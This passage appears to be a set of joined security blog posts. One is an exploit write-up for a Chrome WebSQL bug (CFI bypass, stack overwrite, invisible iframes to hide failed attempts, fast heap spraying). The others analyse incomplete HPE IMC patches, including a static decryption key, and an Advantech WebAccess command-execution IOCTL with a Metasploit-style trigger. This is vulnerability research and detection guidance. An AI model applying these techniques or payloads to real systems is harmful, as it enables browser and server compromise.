sqlite3_free(p->zContentTbl);
sqlite3_free(p->zLanguageid);
/* Invoke the tokenizer destructor to free the tokenizer. */ p->pTokenizer->pModule->xDestroy(p->pTokenizer);
sqlite3_free(p); return SQLITE_OK; }
The line of importance is highlighted. p->pTokenizer is a field within the Fts3Table object. It’s 0x48 offset away from the beginning. The function reads that field, dereferences it a couple times and uses the final value as a function pointer. This is a perfect code control primitive. In assembly, line 49 looks like this.
So what we’re trying to achieve looks like the following.
After finding the primitive, payload was constructed to control $RIP. This was built for the debug compile build of Chromium. After that, the exploit was ported to the vulnerable Chrome stable version (v70.0.3538.77). While porting it, a peculiar happened. $RIP would no longer be controlled, but would jump to a UD2 instruction instead. At first, it was thought that some kind of custom exception handler logic was in play and was snatching the SIGSEGV, but it turned out to be something else. We observed the program right before $RIP was controlled, and realized that the above assembly has changed, and had additional logic on the release build. It looked like the following.
This was obviously some kind of Control Flow Integrity logic. The program was checking if the call destination was in a certain range, and if it wasn’t, it would ruthlessly jump to UD2, terminating the process.
This was interesting, because there was no mention about CFI being enabled on Windows builds, so it was interesting to encounter a CFI implementation on Linux. In fact, there is actually a page in the Chromium website that explains about the CFI, and it states the CFI is currently only implemented in Linux and slated to be released on other platforms some time in the future. All of this is great but what this means for an exploiter is that the CFI would have to be bypassed.
The go-to way to bypass CFI is to achieve AAR/AAW before getting code execution, and work forwards from there. Right now, we only have AAR and no AAW. The first idea to achieve AAW was to manipulate the Expression trees representing the Default Value of a Column object. This is because during the course of experimenting with fake Expr objects, playing with various flags and values led to all kinds of interesting crashes. So conjuring an AAW by creating the right sequence of Expression nodes was one way to deal with it. However, this required another deep dive into how SQLite handles expression trees, and a scavenge through the source code of all of the opcodes, and the accompanying functions.
What we decided to use instead, were the artifacts lying right in front of us. The list of functions that the CFI allowed to call.
For CFI checks on other parts of the code, the function list that CFI permits is very narrow.
In this case, CFI only allows to jump to 8 functions that is predefined in a jump table.
However, in our case, we had a choice of 260 functions to jump to.
That is a lot of functions. With this big list of a function, we just might be able to find a function that matches a certain criteria, that would aid in exploitation. This kind of calling into functions that the CFI allows is called Counterfeit Object Oriented Programming (COOP). It’s actually a term coined by the academia, and is used to describe constructing turing complete ROP gadget sets using only functions that the CFI allows. In essence, it is a generic CFI bypass technique, provided there is a long enough list of functions to choose from. In the paper, they call each of the CFI compliant functions a vfgadget. We will use this term in the remainder of the blogpost, because it’s a short term that could abbreviate “CFI compliant function gadget”. In the paper, the goal is trying to create a turing complete set of vfgadgets, by finding various vfgadgets that serve different purposes. The most important of these gadgets would be the Main Loop Vfgadget. But for our purposes, it is not required to find all of these vfgadgets. We only need to find exactly 1, because AAR is already achieved. The reason for this will be explained in the following section.
There are actually 2 ways to abuse COOP. Both of them will be discussed in the following sections.
Bypassing CFI by gaining AAW
The first way to bypass CFI is to construct an AAW with one of the vfgadgets. What we looked for was a function of this type.
The goal was to call a vfgadget of the above form, and gain AAW. The function did not have to look exactly like the above listing, but anything that would lead to AAW would work. While scavenging through the list of vfgadgets, several functions were found that matched the criteria. However, most of the functions were of this form.
1 2 3 4 5 6 7 8 9 10 11 12
test_function(){
... // A looooooooooooot of things going on here.
...
Before and after our AAW primitive was triggered, there was an abundance of code executed. Because all code within the function uses the this pointer, which points to our ROP payload, there were so many reasons for the program to crash if care wasn’t taken to build a proper fake object that passed all the pointer dereferencing and conditional checks. Therefore, it was desirable to find a vfgadget that was a lot shorter, but still achieved the goal. After an hour of scavenging, we came across this vfgadget.
This is not actually a perfect vfgadget, but it serves our purpose perfectly, and is simple enough the deal with. What this vfgadget gives is an AAW primitive, because at the time of call, $RDI points to attacker controlled payload. By doing a bit of puzzle matching, it is possible to create an AAW primitive that writes a controlled QWORD into an address of our choosing.
Now this brings up the next question. Where are we going to overwrite?
Because the entire binary is compiled with CFI, any function pointer would not be a good choice. Actually, the go-to method for bypassing CFI after gaining AAW is going for the stack return address. This is not possible on recent mobile platforms (Hello PAC and soon to be born companion, Memory Tagging), but the desktop counterpart Intel CET has not arrived yet, so the stack still remains a perfect and the most easiest target.
This brings up the next problem of actually finding the stack. This is easy once AAR is achieved. The stack can be found by following a list of pointers, and the return address can be calculated from the leaked values. Our AAW target was the return address for the above vfgadget. Once the AAW is triggered, it would write an attacker controlled value into the return address which the vfgadget was originally supposed to return to. After the vfgadget is done executing, it would return to our stack pivot gadget, and kick start the ROP chain. To find that return address, it was required to find the WebSQL Database thread’s stack. In order to find that stack address, we first searched for Chrome’s Main Thread stack address. The Main Thread’s stack address is sprinkled on the main stack’s heap, which resides right behind the Chrome image executable in memory. Since this is the main thread’s heap, it is brk‘d and grows right behind the Chrome image.
It was found that certain stack addresses from the Main Chrome Thread lied in the same location in every run, even across reboots. The one with the lowest index was chosen, because that is probably the one that was allocated during the most earliest phases of Chrome execution, so it could be assumed to be allocated there deterministically across different runs. Even if that’s not the case, we can use the AAR and do a heuristic search dynamically in javascript.
Next, we searched for a WebSQL Stack address within the Main Stack.
The WebSQL stack index would change slightly in different runs. This was not a reliable way to leak the WebSQL stack. Perhaps the reason for this is that because on each different run, there are slight changes in chrome environments based on the saved data on disk, or maybe different data received from the Google servers upon each run would introduce a different sequence of functions to be run or maybe introduce an alloca with a different size, making the WebSQL data on the stack move around little bits at a time. However, there is another reliable way. We already have one of the main stack’s address leaked in the previous phase. This is probably an address of a stack variable that is used in a certain function’s stack frame. The thing is, if that function that emcompasses the leaked stack variable is somewhere way down in the stack, it would be relatively free of the stack variance that was described earlier. What this means is that for any other functions called further down in the stack frame, they will be called in a deterministic fashion, lowering the stack frame on each function call in a fixed amount deterministically. As it so happens, the distance between the leaked Main Stack variable and the WebSQL stack address residing on the Main Stack is constant, with a fixed distance of 0x1768. By subtracting 0x1768 from the first address leak, we get the location of the WebSQL stack address that we want to leak. This same concept applies to leak the address of our target return address on the WebSQL stack. Subtracting 0x9C0 from the second leaked value will yield the exact position of our target return address. Since we know the location of the return address, we can construct a COOP payload that will AAW a stack pivot gadget right on top of that address.
The entire process is illustrated below.
This is why we only need exactly one gadget to control $RIP. Because we can AAR our way to find the return address’s location within the stack. From here, it is just standard ROP to execve or system.
The Chrome executable is huge, being 130MB in size. This is because it is statically compiled to include every library excluding the standard ones into the Chrome executable. Therefore, there is no shortage of ROP gadgets to choose from. The only problem is that extracting the gadgets can take a very long time. On the first round of ROP gadget extraction, we weren’t able to find a suitable stack pivot gadget. This is because the ROP stack is littered with values from the AAW vfgadget, in order to make the AAW work properly. The stack pivot needs to dodge all of those values and pick up empty slots within the ROP stack. This led us to run the ROPgadget tool with –depth=20, which was running for 48 hours on a 130MB binary, inside a virtual machine. While we had ROPgadget running, we casually went through the remaining vfgadget list, in hope to find another relatively simple AAW vfgadget that does not litter the ROP stack too much. During that process, we found a completely different way to bypass the CFI.
Bypassing CFI by gaining direct code execution
It turns out that the statement “CFI is universally applied to all indirect function calls” is false. This was realized after discovering the following gadget.
It was awestrucking on the discovery of this vfgadget. It completely dodged the CFI, making a direct call to a virtual function voiding all checks. What is even more remarkable is that this gadget also provides $RDI and $RSI with a completely clean ROP stack to work with. It’s as if someone left it there with the intention of “Use THIS GADGET to bypass the CFI *wink* “. This vfgadget is clearly the winner of all vfgadgets. The Golden Vfgadget that bypasses CFI in one fatal blow. We give our sincere appreciation to whoever contributed to the making of this vfgadget.
All jokes aside, the only plausible reason to explain why this function was left out was because it operates on Tagged Pointers. It seems that the current CFI implementation baked in the compiler gets easily confused when doing direct arithmetic on pointer values. This is shown on line 8 in the above listing. Thanks to this vfgadget, we can use it to directly jump to the stack pivot gadget and ROP from there, entirely skipping AAW. In our exploit, the previous AAW method was used after finding the appropriate stack pivot gadget, but this one would have been much more preferable, had it been discovered earlier.
Making a Stealth Exploit by abusing Chrome’s Site Isolation
Chrome offers a mitigation called Site Isolation. Here is the description of Site Isolation, borrowed from the Chromium webpage.
Site Isolation has been enabled by default in Chrome 67 on Windows, Mac, Linux, and Chrome OS to help to mitigate attacks that are able to read otherwise inaccessible data within a process, such as speculative side-channel attack techniques like Spectre/Meltdown. Site Isolation reduces the amount of valuable cross-site information in a web page’s process, and thus helps limit what an attacker could access.
In addition, Site Isolation also offers more protection against a certain type of web browser security bug, called universal cross-site scripting (UXSS). Security bugs of this form would normally let an attacker bypass the Same Origin Policy within the renderer process, though they don’t give the attacker complete control over the process. Site Isolation can help protect sites even when some forms of these UXSS bugs occur.
There is additional work underway to let Site Isolation offer protection against even more severe security bugs, where a malicious web page gains complete control over its process (also known as “arbitrary code execution”). These protections are not yet fully in place.
To summarize, site isolation mitigates CPU side channel attacks, and protects against UXSS logic bugs. However, it does not protect against gaining UXSS after gaining remote code execution with a renderer bug. Site isolation is also interesting for another perspective, in an exploiter’s point of view. Here’s another quote borrowed from the site.
Site Isolation offers a second line of defense to make such attacks less likely to succeed. It ensures that pages from different websites are always put into different processes, each running in a sandbox that limits what the process is allowed to do. It will also make it possible to block the process from receiving certain types of sensitive data from other sites. As a result, a malicious website will find it more difficult to steal data from other sites, even if it can break some of the rules in its own process.
The important part is emphasized. What this means is that all frames that open a different site from the parent frame, are running in different processes. This can be observed with a little experimentation.
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 6
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 7
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 8
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 9
➜ site_isolation_test ps aux |grep chrome |grep-vgrep|wc-l 10
As more iframes from different sites are added, more processes pop up. This is interesting in an exploiting point of view. What happens if an iframe from a different process crashes?
It does not take down the parent window along with it. It just crashes the process containing the iframe. Does it work with multiple iframes?
Confirmed. What if the iframe is barely visible?
The parent frame lives, and there is no visible indication on the screen that the child iframes crashed.
What this provides to an exploiter is three things.
On every failed exploit attempt, a new iframe can be launched. This provides an exploit a retry attempt, practically an unlimited number of times.
If the iframe is vanishingly small, there is no indication on the screen of exploit failure. The ‘Aww Snap!’ will be contained within the invisible iframe.
Each iframe launches a new process, and all exploit activity will be contained within that process. Whatever busy activity happens in the parent frame will not affect the child frame.
These are great characteristics for an exploit. All of these factors will contribute in enhancing the reliability of an exploit, and make the exploit immune to failures.
For our exploit, since the exploit runs for a fair amount of time, we simulated a scenario where the victim was lured to play a game of Zelda, while the exploit is running in an iframe in the background. The developer console is opened in order to show the exploit working behind the scenes.
The exploit works on all Ubuntu versions, because all exploit primitives are based on the Chrome binary itself, and does not rely on any offsets from the system libraries. In order to actually pop the calculator, Chrome needs to be run with the –no-sandbox flag. Otherwise, the exploit needs to be packed with a reflective-elf payload that is armed with a sandbox escape to pop calculator.
The entire exploit code can be found on our github.
Increasing Speed and Reliability
We will first talk about reliability, because everything about it has been covered in the previous sections. In order to increase reliability, steps should be taken to find the sources of failures, and to fix them. The source of the unreliability has been discussed on each stage, and ways on how to avoid them. This obviously doesn’t cover all sources of failure. While fixing them one by one, new issues will appear and issues that were completely unexpected will also pop up and be added to the to-fix list. It would be wise to just fix the major sources of failures and leave the minor ones as is, until the reliability is increased to over 80%. Then, let the site isolation technique describe above handle the rest of the failures by retrying. That would be a good tradeoff for balancing between creating a good enough exploit, and time invested to increase reliability.
Now let’s talk about reducing the execution time of the exploit. The major source of delay is obviously the spraying phase. This has to be eliminated to increase speed. But spraying is an essential requirement for the exploit. How would it be possible to OOB write to a target object that is 2GB away from the source object, without spraying the heap? The answer to this is that, we preserve spraying, but instead, spray in an efficient way. How is this possible?
The results show that even if the program successfully allocated 4GB amount of memory, it only took a mere 1 milisecond to complete. This is because Linux uses an optimistic memory allocation strategy. The memory is allocated, but it is not actually backed by physical pages until some data is actually written to that piece of memory. More importantly, since only 0x200 bytes are written to the 4GB chunk, all time for writing data on the heap is saved, while still being able to allocate a huge chunk of heap. This enables a situation where you can spray the heap very quickly, without having to write actual data to it. This is a great primitive because our jumping over 2GB heap spray does not require to have actual data in it. It just needs to make space on the heap for the OOB write to jump over. All we need to do is find such primitive.
In the course of building the exploit, such primitive was not actively searched for. However, just by taking a shortglanceatthecommitlogs of SQLite, there is a wealth of heap spray candidates to choose from, and some of them could very well meet the conditions described above.
SQLite is not the only source of finding such primitives. Since the TCMalloc heap is shared by all threads and managed by the Central Cache, heap sprays occurring from any other thread can make a good candidate. Spraying in Thread 1, and then spraying in Thread 2 will make the chunks in Thread 2 be adjacent with the ones sprayed in Thread 1. There will be a very small gap of a couple of pages, but basically, they will be pretty close to each other. Therefore, any heap spray from any kind of functionality in Chrome, that is backed by malloc/new will make a good candidate. Usually, the best place to look for such heap sprays are things that parse complex formats. One of the prime candidates would be font, or media parsing functionality. Finding this new heap spray primitive which could place arbitrary data on the heap, would fill in the missing piece of the alternative exploitation strategy described in Stage 10.
Before ending the blogpost, let’s talk about how to embrace these new primitives, and build a new exploitation strategy.
The new primitives will be named P1 and P2 respectively. P1 is a primitive to create a heap chunk of any size, without having to fill the entire content. P2 is a primitive to create a heap chunk of any size, and the ability to fill the chunk with attacker controlled arbitrary content. In order the refine the exploit strategy, the fts3 root node that contains our OOB chunk for apple, needs to be refined.
staticint fts3SegReaderNext(
Fts3Table *p,
Fts3SegReader *pReader, int bIncr ){ int rc;/* Return code of various sub-routines */ char*pNext;/* Cursor variable */ int nPrefix;/* Number of bytes in term prefix */ int nSuffix;/* Number of bytes in term suffix */
The vulnerable function is also pasted above for reference.
Term 1 is the same. Term 2 has been updated to reallocate the apple chunk into a 2GB chunk. The check on line 21 will be (0x3FFFC000 + 1) > 0, which will make it enter the if clause and reallocate the chunk based on the calculation on line 22, which is slightly less than 2GB. Let’s say, 1.9GB. Afterwards, the memcpy will merely copy 1 byte “A” at the middle of the 1.9GB chunk. This strikes away all the memcpy time, while still being able to allocate a huge 1.9GB chunk. The vulnerability is not actually triggered just yet, and Term 2 just serves the purpose of relocating the 0x10 byte apple chunk into a 1.9GB chunk. Next, Term 3 is parsed and the bug is triggered the same way it was in the original exploitation strategy. But since (0x7FFFFFFF + 1) is a negative value, the check on line 21 is bypassed and it runs straight towards the memcpy. The memcpy will OOB write at an address that is 0x7FFFFFFF bytes away from the start of the 1.9GB chunk, the same way it did in the previous stages. The only difference is that the apple chunk is not in a 0xa00 chunk, but this time, it is in a 1.9GB chunk.
The new exploitation strategy will be like the following.
This is the new refined exploit strategy to increase speed. Since most of the heap spraying is done with P1, which is lightning fast and doesn’t actually fill in any heap data, the entire spraying and probing process until Stage 7 will probably be reduced down to less than 10 seconds. This will actually make the exploit practical, and deployable in the real world. We haven’t actually gone down this route due to time constraints, but we present it here in case anyone wants to play with the concept.
Also, another thing worth mentioning is that this tactic could have probably been used to exploit Chrome on Windows. This is because apple no longer lives in the Low Fragmentation Heap, but now lives in a seperate heap, allocated by NtAllocateVirtualMemory. This makes it possible to have the 1.9GB chunk allocated at a relatively fixed location (which moves around a little due to the guard page size), and not being subject to the randomization of the LFH. To eliminate even the slight randomization completely, the Variable Size Allocation subsegment would also make a good target to place apple in. It would have been interesting to see this bug actually being used to compromise Chrome during Pwn2Own.
Conclusion
Finally, in terms of reliable N-Day exploits for Chrome, there are much better bugs that could achieve speed and reliability, due to the bug characteristics. The prime candidate for such bugs are those that occur in the V8 JIT engine, such as _tsuro‘s excellent V8 bug in Math.expm1. Our N-Day feed provides in-depth analysis and exploits for other kinds of V8 JIT bugs. Exodus nDay subscription can be leveraged by Red Teams to gain a foothold in the enterprise during penetration tests even when critical details about public vulnerabilities have been obscured (like the Magellan bug) or when it simply does not exist.
This post highlights several mistakes in the patches released for vulnerabilities affecting various services of HPE Intelligent Management Center, with a focus on its native binaries.
Author: István Kurucsai
During our work on N-day vulnerabilities, we encounter many different issues with security patches that can leave users of the affected product at risk even if they keep their systems up-to-date. Some fixes don’t attempt to address the underlying vulnerability but apply trivial changes that break the provided proof-of-concept exploit. Examples include removing the specific path used to trigger the issue while leaving others available or adding a layer of encryption to the communication protocol to which the exploit could easily be adapted. Other times, new vulnerabilities are introduced as a result of the code changes or previously unreachable vulnerabilities become exposed. Sometimes the fix is simply incorrect, e.g. it adds a new check for the wrong function call or with the wrong boundary conditions. There are cases where the original analysis of the vulnerability by the security researcher is incomplete, therefore the fixes and detection filters based on it are likely to be incomplete, too. And then there are the patches that don’t actually contain any relevant changes and the vulnerability remains exploitable while the issue is marked as resolved.
HPE Intelligent Management Center is a network management platform with a history of a wide range of vulnerabilities affecting it. It has a vast attack-surface, including web based components and native binaries implementing custom protocols. While the analysis was done on the Linux releases of IMC, it is important to note that the Windows and Linux versions are compiled from the same code base and share the same vulnerabilities.
Hiding Vulnerabilities
A common mistake we encounter during our day-to-day work is when a patch only removes a possible path for triggering the vulnerability instead of actually fixing the issue. A prime example of this is the attempts made at patching several issues affecting the dbman service, which is responsible for the backup and restoration of the databases used by IMC. The Linux version doesn’t have stack cookies and isn’t compiled as PIE. It listens on TCP port 2810 and expects a simple packet header consisting of an opcode and the data length, followed by a DER encoded ASN.1 message. Several vulnerabilities affecting it, including command injections, an arbitrary file write and a stack buffer overflow were published by ZDI in 2017 under the identifiers ZDI-17-336 through ZDI-17-343 and ZDI-17-481 through ZDI-17-484. These are quite similar in nature and close to each other in the code base. Let’s take a quick look at ZDI-17-336/CVE-2017-5820, titled Hewlett Packard Enterprise Intelligent Management Center dbman Opcode 10004 Command Injection Remote Code Execution Vulnerability.
Without going into too much detail, opcode 10004 corresponds to the BackupZipFile operation of dbman. After parsing the packet header and the ASN.1 message, control flow ends up in the CDbBackup::BackupOneLocalZipFile method, which constructs a command line that includes unescaped data from several message fields. This command line is then passed to the runCommand function, which is a wrapper around system, resulting in a command injection vulnerability. For the code snippet below, note that OneZipFileBackupObj is the parsed, unsanitized message from the packet.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
SNACC::AsnRet*__userpurge CDbBackup::BackupOneLocalZipFile@(SNACC::AsnRet*retstr, const CDbBackup *constthis, SNACC::AsnOneZipFileBackupPara*const OneZipFileBackupObj, int ifHost){
In the HPE Security Bulletin corresponding to ZDI-17-336/ CVE-2017-5820, the first patched version is indicated as IMC PLAT 7.3 E0504P04. Looking at the supposedly patched 7.3 E0506 version, the CDbBackup::BackupOneLocalZipFile function seems identical, containing the same vulnerability. Examining its caller, BackupZipFile, the only difference is that a new function, dbman_decode_len, is invoked before the ASN.1 decoding. It’s a rather short method, decrypting the input using DES in ECB mode with a static key, which is liuan814 in version 7.3 E0506.
Examining the call sites for dbman_decode_len, they correspond to the opcodes implicated in the published vulnerabilities, meaning that this is the supposed fix for the issues. While this breaks exploits developed for previous versions of IMC, it’s in no way a proper patch. Simply encrypting the message with the static key enables exploitation of the original vulnerabilities.
The Second Fix
Looking at the newest version (7.3 E0605H05), the vulnerabilities are still present, unpatched. However, the encryption scheme was altered. dbman_decode_len became a simple wrapper around decryptMsg, which reads in keying material from two files in the IMC installation directory, common\conf\ks.dat and server\conf\imchw.conf. This is then used to derive a 256-bit IV and encryption key. These are passed into decryptMsgAes, along with the incoming data from the message, which decrypts it using AES_256_CBC and processing of the message continues as before.
The contents of the ks.dat and imchw.conf are randomly generated upon install or update of the product, therefore interacting with the handlers of the vulnerable message types is impossible without having access to those files. However, IMC has a significant attack-surface and any file read or write vulnerability can be turned into a command injection by leaking or overwriting the key files and triggering the original vulnerabilities. It should also be noted that both schemes are only applied to opcodes in which vulnerabilities were reported, other opcodes remain reachable as before.
New Vulnerability Introduced In The Second Fix
Looking at the decryptMsgAes function, it can be seen that a new vulnerability was introduced that results in a stack buffer overflow. For the code snippet below, note that src is the message read from the network, iEncLen is its length and strDecrypt is a heap allocated buffer in which the decrypted message is passed back to the caller. While there are no meaningful limits on the length of the input message, the code assumes that when decrypted, it fits into 4096 bytes. EVP_DecryptUpdate is part of the OpenSSL library and its documentation states that
the decrypted data buffer out passed to EVP_DecryptUpdate() should have sufficient room for (inl + cipher_block_size) bytes
The variable iEncLen corresponds to inl from the above quote. Since the input can be larger than 4096 bytes, a stack-based buffer overflow can be triggered on line 16 of the snippet below. There’s also the possibility for a heap buffer overflow on lines 20-21 but EVP_DecryptFinal will fail on incorrect padding and it’s impossible to create valid padding without knowing the IV and key. Even though the overflow contents cannot be controlled without knowing the AES key and IV, when combined with a file read or write vulnerability to leak or change the keying material, this issue could be turned into a reliable exploit.
This vulnerability remains unpatched for the time being.
Failed Patches
It’s not uncommon for us to see patches that attempt to solve the root cause of an issue but fail to do so.
Stack Buffer Overflow In tftpserver
The IMC suite includes a TFTP server, implemented by the tftpserver service, which is used to distribute configuration files for devices. The TFTP protocol supports setting the blksize option on a connection, which allows the client and server to negotiate a blocksize more applicable to the network medium. This option is also supported by tftpserver and can be set by a client to an arbitrary 4-byte value as can be seen on the code snippet from the 7.3 E0506 version shown below.
Later on, this value is used to determine not only the block size for the network transmission but also for the file read and write operations. In the TFTP::handleRRQ function, which is responsible for the handling of RRQs (file read requests by the client), the contents of the requested file are read in blksize sized chunks into a fixed size stack buffer of 10000 bytes, as shown below.
The TFTP::getFileData function reads in the requested number of bytes into the stack buffer using fread (code below). Since m_pkg_LimitSize is attacker-controlled, this results in a stack buffer overflow, exploitable by first uploading the payload file to the server using a write request, then setting the blksize option to a value larger than 10000 and requesting the same file via a read request.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
int __cdecl TFTP::getFileData(TFTP *constthis,constchar*filename,int pos,int size,char*buf) {
HPE released a bulletin for the vulnerability, which states that it is fixed in version 7.3 E0605P04. Examining the updated tftpserver binary, the only relevant change seems to be in the TFTP::getFileData function, in which a check was added to ensure that the size variable passed in is below 65536 (0x10000), as shown on the following code extract.
} } } else {
v5 =-1;
XLOG::LogError(-1,"[TFTP::getFileData] Data is too large, more than 64k."); } return v5; }
There are multiple issues with this. As established previously, the buf argument points to a stack buffer that is 10000 bytes in size, so the check still allows an overflow of more than 50Kb. Besides that, the size argument is a signed integer and the blksize is also stored in a signed integer with an arbitrary value, meaning that negative values would also pass the check.
The latest version of IMC, v7.3 (E0605H05), was released on 08-Oct-2018 and still contains this incorrect fix.
The LogMsg Stack Buffer Overflows
An issue that took two iterations to patch properly is the vulnerability in the LogMsg method of the dbman service. The code of the function from version 7.3 E0504 can be seen below. As the name suggests, it’s used to log diagnostic messages. Accordingly, it has around 500 call-sites, many with arbitrarily long attacker-controlled data in the message, which can all result in a stack buffer overflow on line 10.
The vulnerability was patched in version 7.3 E0504P04, according to the HPE security bulletin. The fixed code is shown below and looks OK from a cursory glance, the length of the data written is limited by the use of the vsnprintf function.
However, the Msg buffer is then passed to the LogMsg_P function, which writes the data to the appropriate log file. It suffers from the same vulnerability as LogMsg. Even though the destination buffer on line 13 below is 8192 bytes long and the length of Msg is limited to 8192 bytes by the patch, there are up to a hundred bytes prepended to the actual message, so that the sprintf call can still write out-of-bounds. What is interesting is that triggering the original vulnerability is impossible without also triggering the one in LogMsg_P, meaning that the change probably wasn’t tested at all.
1 2 3 4 5 6 7 8 9 10 11 12 13
int __cdecl LogMsg_P(int Level,char*FuncName,char*Msg) {
The second attempt replaced the sprintf call in LogMsg_P with an appropriately sized snprintf, actually fixing the issue. During the six-month period between the release of the two bulletins, IMC installations remained vulnerable to a supposedly patched vulnerability.
Conclusion
The N-day feed of Exodus provides detailed analysis of publicly disclosed security issues. These include many similar cases, where a vulnerability continues to pose a threat even after applying the vendor-supplied patch. It enables our customers to assess the real risks associated with vulnerabilities and implement proper detection and defensive measures. With our rigorously tested exploit code (supplied as part of the feed), organizations no longer need to rely on minimal proof of concepts that are usually available publicly. Our offerings can be leveraged by Red Teams to gain a foothold in the enterprise during penetration tests even when public exploit code does not exist or is simply unreliable.
During our day-to-day research of N-day vulnerabilities at Exodus, we often come across public advisories containing incorrect root cause analysis of the core vulnerability. This blogpost details one such vulnerability in Advantech WebAccess which is a software suite used for managing SCADA environments. Although the vulnerability in question had been analyzed numerous times by multiple researchers, we discovered that every advisory and public exploit incorrectly denoted “directory traversal” as a factor. Therefore, if anyone tried to implement detection guidance for the vulnerability based solely on the public advisory, that detection would be deemed ineffective as it would likely involve scanning for path traversal characters which aren’t even required to exploit the vulnerability.
Additionally, this vulnerability (and several others within Advantech WebAccess) can be reached via multiple paths, a fact which we believe hasn’t been widely addressed by other blogposts/exploits.
Improper Root Cause Analysis
The vulnerability in 0x2711 IOCTL which is reachable over an RPC service had been disclosed twice by the ZDI as ZDI-18-024 and ZDI-18-483 and each time the vulnerability was described as a “directory traversal” vulnerability. It was also claimed to be patched by the vendor in both advisories until Tenable published a blogpost about it being still unpatched.
While the blogpost correctly mentioned that the lpApplicationName was set to NULL and that an attacker controlled string could be eventually passed to the CreateProcessA API as the lpCommandLine parameter, it was surprising to note the use of path traversal characters in the PoC code, given the fact that directory traversal isn’t even required to execute binaries located outside the application’s directory.
Referring to Microsoft’s documentation of the CreateProcessA API, one can observe the following:
“If lpApplicationName is NULL, the first white space–delimited token of the command line specifies the module name. If you are using a long file name that contains a space, use quoted strings to indicate where the file name ends and the arguments begin (see the explanation for the lpApplicationName parameter). If the file name does not contain an extension, .exe is appended. Therefore, if the file name extension is .com, this parameter must include the .com extension. If the file name ends in a period (.) with no extension, or if the file name contains a path, .exe is not appended. If the file name does not contain a directory path, the system searches for the executable file in the following sequence:
The directory from which the application loaded.
The current directory for the parent process.
The 32-bit Windows system directory. Use the GetSystemDirectory function to get the path of this directory.
The 16-bit Windows system directory. There is no function that obtains the path of this directory, but it is searched. The name of this directory is System.
The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
The directories that are listed in the PATH environment variable. Note that this function does not search the per-application path specified by the App Paths registry key. To include this per-application path in the search sequence, use the ShellExecute function.”
From this description it is apparent that no directory traversal is needed to execute a command like ‘calc.exe’. Lets try to visualize the search process using some Metasploit code which triggers calc.exe using RPC opcode 0x1.
1 2 3 4 5 6
rpcBuffer = NDR.long(connId)+# connection ID
NDR.long(0x2711)+# vuln IOCTL
NDR.long(0)+
NDR.UniConformantArray("calc.exe\x00")# string passed to CreateProcessA()
dcerpc_call(0x1, rpcBuffer)
In the code above one creates an RPC buffer with the connection ID obtained via RPC opcode 0x4, the vulnerable IOCTL code, and the command to execute as a NULL terminated string, which will be passed to CreateProcessA. Once this buffer is created, it will be sent to the vulnerable Advantech WebAccess RPC server using RPC opcode 0x1, at which point a search operation will be conducted to find the location where calc.exe is located. This can be seen in the screenshot below.
Windows searching for the location of the calc.exe binary
Therefore, as a result of CreateProcessA’s behavior, an attacker could either choose to supply the full path to an executable file or provide just the executable filename and Windows would automatically locate and execute that binary based on the criteria given above. As a result, defenders cannot simply rely on detecting the presence of directory traversal characters to determine if the same IOCTL request is being abused for malicious purposes.
This proves that the aforementioned vulnerability can be categorized as an arbitrary command execution vulnerability and no directory traversal is required for its exploitation.
The Vulnerable Code Exists In Two Locations (Not One)
The vulnerable implementation of 0x2711 IOCTL is contained in two binaries, namely drawsrv.dll and viewsrv.dll. Tenable’s analysis only uncovered the implementation in drawsrv.dll and did not cover the vulnerable code located in viewsrv.dll. The alternative code path can be seen in the image below.
The code flow to this branch is the result of a subtle comparison made at 0x404838 within sub_4046D0 as shown below. Within this code, a comparison is made to see whether the connection type associated with a client’s RPC session is of type 0, in which case VsDaqWebService is called, or 2, in which case DsDaqWebService is called.
.text:00404838moveax,[esi+14h] .text:0040483B testeax,eax; check connType value .text:0040483D jnz short check_for_DsDaqWebService .text:0040483Fcmpebx,2710h .text:00404845jl ioctl_not_in_0x2710_0x4e20_range .text:0040484B cmpebx,4E20h .text:00404851jge ioctl_not_in_0x2710_0x4e20_range .text:00404857pushesi; proceed to call VsDaqWebService .text:00404857; located further down .text:00404858movecx,edi .text:0040485A call sub_4045B0 .text:0040485Ftesteax,eax .text:00404861jz short ioctl_not_in_0x2710_0x4e20_range .text:00404863moveax,[esi+4] .text:00404866testeax,eax .text:00404868jz short ioctl_not_in_0x2710_0x4e20_range .text:0040486A moveax,[esi+8] .text:0040486D testeax,eax .text:0040486Fjz short ioctl_not_in_0x2710_0x4e20_range .text:00404871push offset sub_403190 .text:00404876movecx,[ebp+arg_14] .text:00404879pushecx .text:0040487A movedx,[ebp+Dest] .text:0040487D pushedx .text:0040487E movecx,[ebp+arg_C] .text:00404881pushecx .text:00404882movesi,[ebp+Str1] .text:00404885pushesi .text:00404886pushebx .text:00404887movedx,[ebp+arg_4] .text:0040488A pushedx .text:0040488B calleax; VsDaqWebService .text:0040488D movecx,[ebp+arg_1C] .text:00404890mov[ecx],eax .text:00404892jmp short loc_4048DE .text:00404894; --------------------------------------------------------------------------- .text:00404894 .text:00404894 check_for_DsDaqWebService:; CODE XREF: sub_4046D0+16D↑j .text:00404894cmpeax,2 .text:00404897jnz short ioctl_not_in_0x2710_0x4e20_range .text:00404899cmpebx,2710h .text:0040489Fjl short ioctl_not_in_0x2710_0x4e20_range .text:004048A1 cmpebx,4E20h .text:004048A7 jge short ioctl_not_in_0x2710_0x4e20_range .text:004048A9 pushesi; proceed to call DsDaqWebService .text:004048A9 ; located further down .text:004048AA movecx,edi .text:004048AC call sub_4045B0 .text:004048B1 testeax,eax .text:004048B3 jz short ioctl_not_in_0x2710_0x4e20_range .text:004048B5 push offset sub_403190 .text:004048BA movedx,[ebp+arg_14] .text:004048BD pushedx .text:004048BE moveax,[ebp+Dest] .text:004048C1 pusheax .text:004048C2 movecx,[ebp+arg_C] .text:004048C5 pushecx .text:004048C6 movesi,[ebp+Str1] .text:004048C9 pushesi .text:004048CA pushebx .text:004048CB movedx,[ebp+arg_4] .text:004048CE pushedx .text:004048CF call DsDaqWebService
It can also be seen that the code handling the vulnerable 0x2711 IOCTL in both binaries look nearly identical.
